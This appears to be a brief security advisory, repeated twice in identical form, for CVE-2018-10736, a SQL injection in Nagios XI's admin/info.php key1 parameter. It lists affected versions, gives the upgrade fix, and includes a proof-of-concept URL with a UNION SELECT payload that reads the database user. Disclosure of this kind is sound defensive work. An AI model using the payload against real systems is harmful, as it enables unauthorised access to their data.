### NagiosXI <= 5.4.12 info.php SQL injection(CVE-2018-10736) #### Description A SQL injection issue was discovered in Nagios XI via the admin/info.php key1 parameter. #### Affected Version * Nagios XI 5.2.x * Nagios XI 5.4.x before 5.4.13 #### Proof of concept ``` http://xxxx/nagiosql/admin/info.php?key1='%20union%20select%20concat(0x7e7e7e,user(),0x7e7e7e)%23 ```  #### Fix Upgrade to version 5.4.13
### NagiosXI <= 5.4.12 info.php SQL injection(CVE-2018-10736) #### Description A SQL injection issue was discovered in Nagios XI via the admin/info.php key1 parameter. #### Affected Version * Nagios XI 5.2.x * Nagios XI 5.4.x before 5.4.13 #### Proof of concept ``` http://xxxx/nagiosql/admin/info.php?key1='%20union%20select%20concat(0x7e7e7e,user(),0x7e7e7e)%23 ```  #### Fix Upgrade to version 5.4.13